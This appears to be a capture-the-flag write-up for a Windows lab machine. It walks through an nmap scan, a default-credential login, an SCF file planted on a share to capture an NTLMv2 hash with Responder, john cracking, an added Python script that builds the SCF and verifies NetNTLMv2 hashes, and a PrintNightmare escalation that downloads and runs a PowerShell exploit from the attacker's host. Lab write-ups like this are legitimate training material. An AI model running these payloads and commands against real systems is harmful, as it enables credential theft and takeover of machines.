Basic information

Port scan

Ports 80, 135 and 445 (SMB) are open:

$ nmap -sC -sV 10.10.11.106

Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-05 16:26 CST
Nmap scan report for 10.10.11.106
Host is up (0.34s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2021-10-05T15:33:20
|_ start_date: 2021-10-05T06:54:58
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 6h59m59s, deviation: 1s, median: 6h59m58s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 473.46 seconds

Port 80

401 basic authentication:

admin:admin gets straight in:

SCF attack

The firmware upload page says uploaded files go to a file share. Combined with the SMB service seen earlier, that makes an SCF attack worth trying: a .scf file dropped on a share makes Explorer fetch its IconFile over SMB from our host as soon as someone lists the folder, and that request carries the user's NTLM authentication.

Start Responder, upload the .scf, and capture the hash:

sudo python ~/Tools/Responder/Responder.py -I utun2 -i 10.10.14.2 -wrf --lm -v

[SMB] NTLMv2 Hash : tony::DRIVER:1122334455667788:9C9737B541A64CF6074D8DAA2DCAA4A6:0101000000000000CA97DA58FFB9D701CECD6880AD30A6F100000000020000000000000000000000

hash crack

The NetNTLMv2 line from Responder goes into hash.txt as-is and john cracks it with rockyou:
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

liltony (tony)

@miao.scf

[Shell]
Command=2
IconFile=\\10.10.14.2\miao\test.ico
[Taskbar]
Command=ToggleDesktop
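The three steps above (plant the .scf, capture the NetNTLMv2 line, crack it) are easy to get wrong when a capture looks odd, so here is an added example, not code from the original writeup or from Responder, that does the whole round trip offline in Python: it builds the .scf payload, parses Responder's "[SMB] NTLMv2 Hash : ..." line, and recomputes NTProofStr for a candidate password the way the Windows client (and john/hashcat mode 5600) do it. MD4 is implemented in pure Python because hashlib on OpenSSL 3 builds often does not expose it; the sample challenge and blob are constructed here and are not a real capture, and the captured line from this page is run through the same check without asserting its result.

```python
"""
SCF capture + offline NetNTLMv2 check (added example, not from the writeup).

MS-NLMP recap, which is all a cracker does per wordlist candidate:
  NT hash    = MD4(UTF-16LE(password))
  NTLMv2 key = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))
  NTProofStr = HMAC-MD5(NTLMv2 key, server_challenge || blob)
Responder fixes the server challenge (1122334455667788 by default), so every
captured response is crackable offline against a wordlist.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); used because hashlib may lack it."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _rotl((a + hh(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntproofstr(password, user, domain, server_challenge, blob):
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def build_scf(attacker_ip, share, icon="test.ico"):
    """The @miao.scf payload from the writeup, parameterised (CRLF line ends for Windows)."""
    return "\r\n".join(["[Shell]", "Command=2",
                        f"IconFile=\\\\{attacker_ip}\\{share}\\{icon}",
                        "[Taskbar]", "Command=ToggleDesktop", ""])


def parse_responder_line(line):
    """'[SMB] NTLMv2 Hash : user::DOMAIN:chal:proof:blob' -> fields; 'john' is the string hash.txt needs."""
    hash_str = line.split("NTLMv2 Hash :")[-1].strip()
    user, _, rest = hash_str.partition("::")
    domain, chal, proof, blob = rest.split(":")
    if len(chal) != 16 or len(proof) != 32:
        raise ValueError("unexpected field sizes; not a NetNTLMv2 line")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob), "john": hash_str}


def check_password(line, candidate):
    """True when the candidate reproduces the captured NTProofStr."""
    p = parse_responder_line(line)
    got = ntproofstr(candidate, p["user"], p["domain"], p["challenge"], p["blob"])
    return hmac.compare_digest(got, p["proof"])


# Constructed sample (not a real capture): made-up challenge/blob, proof computed from "liltony".
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "0f0e0d0c0b0a0908" + "00" * 16)
SAMPLE_LINE = "[SMB] NTLMv2 Hash : tony::DRIVER:%s:%s:%s" % (
    SAMPLE_CHALLENGE.hex(),
    ntproofstr("liltony", "tony", "DRIVER", SAMPLE_CHALLENGE, SAMPLE_BLOB).hex(),
    SAMPLE_BLOB.hex())

# The line Responder printed in the writeup above.
PAGE_LINE = ("[SMB] NTLMv2 Hash : tony::DRIVER:1122334455667788:9C9737B541A64CF6074D8DAA2DCAA4A6:"
             "0101000000000000CA97DA58FFB9D701CECD6880AD30A6F100000000020000000000000000000000")

if __name__ == "__main__":
    print(build_scf("10.10.14.2", "miao"))
    print("constructed sample, liltony:", check_password(SAMPLE_LINE, "liltony"))
    print("writeup capture, liltony:", check_password(PAGE_LINE, "liltony"))
```

The parsed "john" field is exactly what goes into hash.txt for john (netntlmv2) or hashcat -m 5600; check_password is the single-candidate version of what those tools run over the whole wordlist.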

user flag

Log in with the recovered credentials over WinRM and read user.txt from the desktop:
evil-winrm -i 10.10.11.106 -u tony -p liltony

Privilege escalation enumeration

spoolsv.exe is visible in the process list, and the box is printer-themed, which points at the recent PrintNightmare (CVE-2021-1675 / CVE-2021-34527) in the Print Spooler service:

PrintNightmare & root flag

There are many ways to exploit it; here the PowerShell PoC is loaded from our host, used to add a local administrator account, and that account logs in to read root.txt:
IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.2:7778/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "miao" -NewPassword "SuperSecure"

evil-winrm -i 10.10.11.106 -u miao -p SuperSecure

References